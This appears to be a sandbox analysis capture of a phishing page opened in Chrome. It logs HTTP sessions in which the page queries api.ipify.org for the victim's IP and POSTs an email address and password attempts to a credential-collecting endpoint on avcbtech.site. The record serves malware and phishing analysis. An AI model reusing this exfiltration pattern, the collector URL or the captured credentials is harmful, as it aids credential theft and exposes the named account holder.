2025-03-17 21:35:09 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-17 21:35:09 UTC	429	IN	HTTP/1.1 200 OK Date: Mon, 17 Mar 2025 21:35:09 GMT Content-Type: application/json Content-Length: 21 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 921f9e53efb9e55d-EWR server-timing: cfL4;desc="?proto=TCP&rtt=2095&min_rtt=2092&rtt_var=790&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=961&delivery_rate=1379310&cwnd=87&unsent_bytes=0&cid=f621129b9a92c2fb&ts=143&x=0"
2025-03-17 21:35:09 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"ip":"8.46.123.189"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.24	60846	104.168.138.190	443	5628	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-17 21:35:16 UTC	634	OUT	POST /muk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 42 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-17 21:35:16 UTC	42	OUT	Data Raw: 61 69 3d 62 66 72 69 65 64 65 6e 25 34 30 63 6f 73 62 2e 6f 72 67 26 70 72 3d 56 6b 53 6a 6d 53 36 4e 25 32 43 25 34 30 31 6d Data Ascii: ai=bfrieden%40cosb.org&pr=VkSjmS6N%2C%401m
2025-03-17 21:35:29 UTC	559	IN	HTTP/1.1 200 OK Date: Mon, 17 Mar 2025 21:35:16 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=76cb234bdd792ebbf080c4601ffe18e2; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-17 21:35:29 UTC	60	IN	Data Raw: 33 31 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 49 6e 63 6f 72 72 65 63 74 20 70 61 73 73 77 6f 72 64 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 31{"status":"error","message":"Incorrect password"}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.24	60847	104.26.13.205	443	5628	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-17 21:35:17 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-17 21:35:17 UTC	463	IN	HTTP/1.1 200 OK Date: Mon, 17 Mar 2025 21:35:17 GMT Content-Type: application/json Content-Length: 21 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 921f9e8458a2421d-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1580&min_rtt=1571&rtt_var=607&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2815&recv_bytes=1121&delivery_rate=1775075&cwnd=191&unsent_bytes=0&cid=5c52f393fefa5ffe&ts=176&x=0"
2025-03-17 21:35:17 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"ip":"8.46.123.189"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.24	60848	104.26.13.205	443	5628	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-17 21:35:17 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-17 21:35:17 UTC	430	IN	HTTP/1.1 200 OK Date: Mon, 17 Mar 2025 21:35:17 GMT Content-Type: application/json Content-Length: 21 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 921f9e885fdf42ad-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1593&min_rtt=1582&rtt_var=616&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=961&delivery_rate=1742243&cwnd=196&unsent_bytes=0&cid=a62623d4fd68ef10&ts=136&x=0"
2025-03-17 21:35:17 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"ip":"8.46.123.189"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.24	60849	104.168.138.190	443	5628	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-17 21:35:30 UTC	389	OUT	GET /muk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-17 21:35:30 UTC	559	IN	HTTP/1.1 200 OK Date: Mon, 17 Mar 2025 21:35:30 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=113011ed5fd7a342940c9ddd5f375d13; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-17 21:35:30 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.24	60850	104.168.138.190	443	5628	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-17 21:35:40 UTC	634	OUT	POST /muk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 26 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-17 21:35:40 UTC	26	OUT	Data Raw: 61 69 3d 62 66 72 69 65 64 65 6e 25 34 30 63 6f 73 62 2e 6f 72 67 26 70 72 3d Data Ascii: ai=bfrieden%40cosb.org&pr=
2025-03-17 21:35:40 UTC	559	IN	HTTP/1.1 200 OK Date: Mon, 17 Mar 2025 21:35:40 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=063303937c3a75bed52c8cab2c68d9a9; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-17 21:35:40 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.24	60852	104.26.13.205	443	5628	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-17 21:35:40 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-17 21:35:40 UTC	463	IN	HTTP/1.1 200 OK Date: Mon, 17 Mar 2025 21:35:40 GMT Content-Type: application/json Content-Length: 21 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 921f9f18ab343869-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1654&min_rtt=1651&rtt_var=626&sent=3&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=1121&delivery_rate=1739130&cwnd=197&unsent_bytes=0&cid=142a1d6601dc6448&ts=130&x=0"
2025-03-17 21:35:40 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"ip":"8.46.123.189"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.24	60853	104.168.138.190	443	5628	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-17 21:35:41 UTC	441	OUT	GET /muk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=113011ed5fd7a342940c9ddd5f375d13
2025-03-17 21:35:41 UTC	495	IN	HTTP/1.1 200 OK Date: Mon, 17 Mar 2025 21:35:41 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-17 21:35:41 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.24	60854	104.26.13.205	443	5628	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-17 21:35:41 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-17 21:35:41 UTC	429	IN	HTTP/1.1 200 OK Date: Mon, 17 Mar 2025 21:35:41 GMT Content-Type: application/json Content-Length: 21 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 921f9f1e3dffc674-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1700&min_rtt=1634&rtt_var=744&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=961&delivery_rate=1350601&cwnd=96&unsent_bytes=0&cid=26542b7d9fa0ea2f&ts=146&x=0"
2025-03-17 21:35:41 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"ip":"8.46.123.189"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.24	60855	104.168.138.190	443	5628	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-17 21:35:49 UTC	634	OUT	POST /muk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 38 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-17 21:35:49 UTC	38	OUT	Data Raw: 61 69 3d 62 66 72 69 65 64 65 6e 25 34 30 63 6f 73 62 2e 6f 72 67 26 70 72 3d 4a 4e 54 49 37 4f 25 32 34 4d 46 35 Data Ascii: ai=bfrieden%40cosb.org&pr=JNTI7O%24MF5
2025-03-17 21:36:01 UTC	559	IN	HTTP/1.1 200 OK Date: Mon, 17 Mar 2025 21:35:49 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=19a3b41db0b411275bb8cbc0bd14eccb; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-17 21:36:01 UTC	60	IN	Data Raw: 33 31 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 49 6e 63 6f 72 72 65 63 74 20 70 61 73 73 77 6f 72 64 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 31{"status":"error","message":"Incorrect password"}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.24	60857	104.26.13.205	443	5628	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-17 21:35:49 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-17 21:35:49 UTC	463	IN	HTTP/1.1 200 OK Date: Mon, 17 Mar 2025 21:35:49 GMT Content-Type: application/json Content-Length: 21 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 921f9f5108d043fb-EWR server-timing: cfL4;desc="?proto=TCP&rtt=2369&min_rtt=2358&rtt_var=908&sent=3&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1121&delivery_rate=1190379&cwnd=150&unsent_bytes=0&cid=6cae7bd1795e6fd7&ts=134&x=0"
2025-03-17 21:35:49 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"ip":"8.46.123.189"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.24	60858	104.26.13.205	443	5628	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-17 21:35:50 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-17 21:35:50 UTC	430	IN	HTTP/1.1 200 OK Date: Mon, 17 Mar 2025 21:35:50 GMT Content-Type: application/json Content-Length: 21 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 921f9f54e8ea005e-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1660&min_rtt=1654&rtt_var=633&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=961&delivery_rate=1711606&cwnd=127&unsent_bytes=0&cid=951e8eb33318ea47&ts=150&x=0"
2025-03-17 21:35:50 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"ip":"8.46.123.189"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.24	63137	104.168.138.190	443	5628	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-17 21:36:02 UTC	441	OUT	GET /muk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=113011ed5fd7a342940c9ddd5f375d13
2025-03-17 21:36:02 UTC	495	IN	HTTP/1.1 200 OK Date: Mon, 17 Mar 2025 21:36:02 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-17 21:36:02 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.24	63143	104.168.138.190	443	5628	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-17 21:36:31 UTC	634	OUT	POST /muk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 26 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-17 21:36:31 UTC	26	OUT	Data Raw: 61 69 3d 62 66 72 69 65 64 65 6e 25 34 30 63 6f 73 62 2e 6f 72 67 26 70 72 3d Data Ascii: ai=bfrieden%40cosb.org&pr=
2025-03-17 21:36:32 UTC	559	IN	HTTP/1.1 200 OK Date: Mon, 17 Mar 2025 21:36:31 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=58cc69140ec500c19e73baab60f5ebfd; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-17 21:36:32 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.24	63145	104.26.13.205	443	5628	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-17 21:36:32 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-17 21:36:32 UTC	463	IN	HTTP/1.1 200 OK Date: Mon, 17 Mar 2025 21:36:32 GMT Content-Type: application/json Content-Length: 21 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 921fa05aac4f5e80-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1585&min_rtt=1585&rtt_var=595&sent=3&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1121&delivery_rate=1836477&cwnd=214&unsent_bytes=0&cid=b7d7b592564364b8&ts=124&x=0"
2025-03-17 21:36:32 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"ip":"8.46.123.189"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.24	63146	104.168.138.190	443	5628	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-17 21:36:32 UTC	441	OUT	GET /muk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=113011ed5fd7a342940c9ddd5f375d13
2025-03-17 21:36:33 UTC	495	IN	HTTP/1.1 200 OK Date: Mon, 17 Mar 2025 21:36:32 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-17 21:36:33 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.24	63147	104.26.12.205	443	5628	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-17 21:36:33 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-17 21:36:33 UTC	430	IN	HTTP/1.1 200 OK Date: Mon, 17 Mar 2025 21:36:33 GMT Content-Type: application/json Content-Length: 21 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 921fa05f287743f2-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1741&min_rtt=1738&rtt_var=659&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=961&delivery_rate=1652518&cwnd=178&unsent_bytes=0&cid=12f3d4273e8f499b&ts=159&x=0"
2025-03-17 21:36:33 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"ip":"8.46.123.189"}

Statistics

CPU Usage

• chrome.exe
• chrome.exe
• chrome.exe

Click to jump to process

Memory Usage

• chrome.exe
